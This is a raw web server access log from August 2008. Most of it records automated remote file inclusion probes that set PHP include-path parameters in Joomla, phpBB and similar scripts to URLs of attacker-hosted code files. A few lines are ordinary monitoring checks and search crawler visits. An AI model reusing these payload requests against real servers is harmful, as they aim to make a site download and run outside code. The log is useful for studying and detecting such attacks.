67.210.98.145 - - [30/Aug/2008:00:49:35 -0400] "GET /logs/access_log.Q108081000//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
67.210.98.145 - - [30/Aug/2008:00:49:35 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
67.210.98.145 - - [30/Aug/2008:00:49:35 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
67.210.98.145 - - [30/Aug/2008:00:49:35 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
67.210.98.145 - - [30/Aug/2008:00:49:35 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
67.210.98.145 - - [30/Aug/2008:00:49:35 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
67.210.98.145 - - [30/Aug/2008:00:49:35 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
85.21.163.40 - - [30/Aug/2008:00:49:40 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
85.21.163.40 - - [30/Aug/2008:00:49:41 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
85.21.163.40 - - [30/Aug/2008:00:49:41 -0400] "GET /logs/error_log.Q108072300//index.php?DOCUMENT_ROOT=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
85.21.163.40 - - [30/Aug/2008:00:49:41 -0400] "GET /logs/access_log.Q108072300//index.php?DOCUMENT_ROOT=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
193.26.13.170 - - [30/Aug/2008:00:49:48 -0400] "GET /phphtml.php?htmlclass_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:49:53 -0400] "GET /logs/phphtml.php?htmlclass_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
200.53.114.42 - - [30/Aug/2008:00:49:59 -0400] "GET /logs/access_log.Q108072300/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 291 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:49:59 -0400] "GET /logs/error_log.Q108081100//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:50:00 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:50:01 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.76"
218.38.54.160 - - [30/Aug/2008:00:50:08 -0400] "GET /phphtml.php?htmlclass_path=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/gallery/warta.gif? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
195.22.94.70 - - [30/Aug/2008:00:50:22 -0400] "GET /logs/access_log.Q108062100//webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://www.asirmt.org//components/com_extcalendar/upload/id.txt??%0D?? HTTP/1.1" 404 270 "-" "libwww-perl/5.65"
84.21.71.133 - - [30/Aug/2008:00:51:46 -0400] "GET /logs/error_log.Q108081200%20//convert/mvcw.php?step=1&vwar_root=http://www.asrintl1.com/usps/claroline/manual/id3.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
84.21.71.133 - - [30/Aug/2008:00:52:14 -0400] "GET /logs/error_log.Q108032100%20//convert/mvcw.php?step=1&vwar_root=http://www.asrintl1.com/usps/claroline/manual/id3.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
209.59.12.99 - - [30/Aug/2008:00:52:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.22.94.70 - - [30/Aug/2008:00:52:42 -0400] "GET /logs/error_log.Q108071200%20//webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://www.asirmt.org//components/com_extcalendar/upload/id.txt??%0D?? HTTP/1.1" 404 270 "-" "libwww-perl/5.65"
67.210.98.145 - - [30/Aug/2008:00:52:45 -0400] "GET /logs/error_log.Q108081000//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
67.210.98.145 - - [30/Aug/2008:00:52:45 -0400] "GET /logs/error_log.Q108081000//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
67.210.98.145 - - [30/Aug/2008:00:52:45 -0400] "GET /logs/error_log.Q108081000//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
83.172.148.42 - - [30/Aug/2008:00:52:52 -0400] "GET /logs/access_log.Q108072300//index.php?DOCUMENT_ROOT=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.172.148.42 - - [30/Aug/2008:00:52:52 -0400] "GET //index.php?DOCUMENT_ROOT=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.172.148.42 - - [30/Aug/2008:00:52:52 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.172.148.42 - - [30/Aug/2008:00:52:56 -0400] "GET /logs/error_log.Q108072300//index.php?DOCUMENT_ROOT=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
200.53.114.42 - - [30/Aug/2008:00:53:18 -0400] "GET /logs/access_log.Q108081100//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:53:31 -0400] "GET /logs/error_log.Q108081100/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.76"
66.249.71.233 - - [30/Aug/2008:00:54:31 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LBF55292424842700F80803Z+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.53.114.42 - - [30/Aug/2008:00:54:57 -0400] "GET /logs/error_log.Q108080500//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:54:58 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:55:05 -0400] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.76"
193.26.13.170 - - [30/Aug/2008:00:56:04 -0400] "GET /logs/access_log.Q108052400//newspublish/include.php?path%5Bdocroot%5D=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:56:07 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:56:13 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
85.21.163.40 - - [30/Aug/2008:00:56:23 -0400] "GET /logs/error_log.Q108071900%20//index.php?DOCUMENT_ROOT=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
85.21.163.40 - - [30/Aug/2008:00:56:24 -0400] "GET /logs/error_log.Q108072300%20//index.php?DOCUMENT_ROOT=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
75.127.70.16 - - [30/Aug/2008:00:56:26 -0400] "GET /logs/access_log.Q108080100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 272 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
75.127.70.16 - - [30/Aug/2008:00:56:27 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 245 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
83.172.148.42 - - [30/Aug/2008:00:56:28 -0400] "GET /logs/error_log.Q108071900//index.php?DOCUMENT_ROOT=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.18.81.164 - - [30/Aug/2008:00:57:02 -0400] "GET /logs/error_log.Q108062500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
85.18.81.164 - - [30/Aug/2008:00:57:08 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
85.18.81.164 - - [30/Aug/2008:00:57:13 -0400] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
62.210.139.66 - - [30/Aug/2008:00:57:16 -0400] "GET /logs/access_log.Q108080100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 272 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
62.210.139.66 - - [30/Aug/2008:00:57:16 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 245 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
62.210.139.66 - - [30/Aug/2008:00:57:23 -0400] "GET /logs/access_log.Q108080100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 272 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
62.210.139.66 - - [30/Aug/2008:00:57:23 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 245 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
62.210.139.66 - - [30/Aug/2008:00:57:23 -0400] "GET /logs/access_log.Q108080100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 272 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
62.210.139.66 - - [30/Aug/2008:00:57:23 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 245 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
62.210.139.66 - - [30/Aug/2008:00:57:38 -0400] "GET /logs/access_log.Q108080100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 272 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
62.210.139.66 - - [30/Aug/2008:00:57:38 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 245 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
75.127.70.16 - - [30/Aug/2008:00:57:38 -0400] "GET /logs/access_log.Q108080100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 272 "-" "libwww-perl/5.811"
75.127.70.16 - - [30/Aug/2008:00:57:38 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 245 "-" "libwww-perl/5.811"
75.127.70.16 - - [30/Aug/2008:00:57:38 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 250 "-" "libwww-perl/5.811"
85.17.6.7 - - [30/Aug/2008:00:57:41 -0400] "GET /logs/access_log.Q108080100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 272 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.17.6.7 - - [30/Aug/2008:00:57:41 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 245 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
209.59.12.99 - - [30/Aug/2008:00:57:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.210.139.66 - - [30/Aug/2008:00:58:16 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:00:58:16 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:00:58:16 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:00:58:18 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
75.127.70.16 - - [30/Aug/2008:00:58:22 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 245 "-" "libwww-perl/5.811"
75.127.70.16 - - [30/Aug/2008:00:58:26 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 231 "-" "libwww-perl/5.811"
85.17.6.7 - - [30/Aug/2008:00:58:31 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
85.17.6.7 - - [30/Aug/2008:00:58:32 -0400] "GET /logs/access_log.Q108080100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
85.17.6.7 - - [30/Aug/2008:00:58:32 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
85.17.6.7 - - [30/Aug/2008:00:58:32 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
85.17.6.7 - - [30/Aug/2008:00:58:35 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:00:58:36 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:00:58:36 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:00:58:36 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:00:58:36 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
200.53.114.42 - - [30/Aug/2008:00:58:44 -0400] "GET /logs/error_log.Q108071100//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:58:44 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:58:48 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.76"
195.22.94.70 - - [30/Aug/2008:00:59:32 -0400] "GET /logs/access_log.Q108071200//webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://www.asirmt.org//components/com_extcalendar/upload/id.txt??%0D?? HTTP/1.1" 404 270 "-" "libwww-perl/5.65"
195.22.94.70 - - [30/Aug/2008:00:59:32 -0400] "GET //webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://www.asirmt.org//components/com_extcalendar/upload/id.txt??%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.65"
195.22.94.70 - - [30/Aug/2008:00:59:32 -0400] "GET /logs//webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://www.asirmt.org//components/com_extcalendar/upload/id.txt??%0D?? HTTP/1.1" 404 248 "-" "libwww-perl/5.65"
195.22.94.70 - - [30/Aug/2008:00:59:41 -0400] "GET /logs/access_log.Q108062100//webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://www.asirmt.org//components/com_extcalendar/upload/id.txt??%0D?? HTTP/1.1" 404 270 "-" "libwww-perl/5.65"
62.210.139.66 - - [30/Aug/2008:00:59:42 -0400] "GET /logs/access_log.Q108080100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:00:59:43 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:00:59:43 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:01:00:07 -0400] "GET /logs/access_log.Q108080100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:01:00:07 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:01:00:07 -0400] "GET /logs/access_log.Q108080100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:01:00:07 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:01:00:07 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:01:00:07 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:01:00:10 -0400] "GET /logs/access_log.Q108080100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:01:00:10 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
62.210.139.66 - - [30/Aug/2008:01:00:10 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
74.6.8.96 - - [30/Aug/2008:01:00:24 -0400] "GET /logs/error_log.Q108012800 HTTP/1.0" 200 118508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
218.38.54.160 - - [30/Aug/2008:01:00:25 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/gallery/warta.gif? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
193.26.13.170 - - [30/Aug/2008:01:00:54 -0400] "GET /logs/error_log.Q108052400//newspublish/include.php?path%5Bdocroot%5D=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
218.189.215.146 - - [30/Aug/2008:01:01:30 -0400] "GET /logs/error_log.Q108042500//convert/mvcw.php?step=1&vwar_root=http://www.topyn.com/ips.txt? HTTP/1.0" 404 241 "-" "libwww-perl/5.805"
218.189.215.146 - - [30/Aug/2008:01:01:30 -0400] "GET //convert/mvcw.php?step=1&vwar_root=http://www.topyn.com/ips.txt? HTTP/1.0" 404 215 "-" "libwww-perl/5.805"
218.189.215.146 - - [30/Aug/2008:01:01:31 -0400] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.topyn.com/ips.txt? HTTP/1.0" 404 220 "-" "libwww-perl/5.805"
75.127.70.16 - - [30/Aug/2008:01:02:01 -0400] "GET /logs/error_log.Q108052700//modules/agendax/addevent.inc.php?agendax_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 257 "-" "libwww-perl/5.811"
75.127.70.16 - - [30/Aug/2008:01:02:01 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 231 "-" "libwww-perl/5.811"
75.127.70.16 - - [30/Aug/2008:01:02:01 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
209.59.12.99 - - [30/Aug/2008:01:02:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.189.215.146 - - [30/Aug/2008:01:02:51 -0400] "GET /logs/error_log.Q108050400//convert/mvcw.php?step=1&vwar_root=http://www.topyn.com/ips.txt? HTTP/1.0" 404 241 "-" "libwww-perl/5.805"
75.127.70.16 - - [30/Aug/2008:01:04:10 -0400] "GET /logs/error_log.Q108052100//modules/agendax/addevent.inc.php?agendax_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 257 "-" "libwww-perl/5.811"
85.17.6.7 - - [30/Aug/2008:01:04:26 -0400] "GET /logs/error_log.Q108052700//modules/agendax/addevent.inc.php?agendax_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
85.17.6.7 - - [30/Aug/2008:01:04:27 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
85.17.6.7 - - [30/Aug/2008:01:04:27 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
200.53.114.42 - - [30/Aug/2008:01:06:15 -0400] "GET /logs/access_log.Q108081300/lostpasswd.php?env[include_prefix]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:01:06:19 -0400] "GET /lostpasswd.php?env[include_prefix]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:01:06:20 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.76"
221.130.201.43 - - [30/Aug/2008:01:06:32 -0400] "GET /logs/access_log.Q108080100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 272 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
221.130.201.43 - - [30/Aug/2008:01:06:33 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 245 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
200.53.114.42 - - [30/Aug/2008:01:06:37 -0400] "GET /logs/error_log.Q108081300/lostpasswd.php?env[include_prefix]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.76"
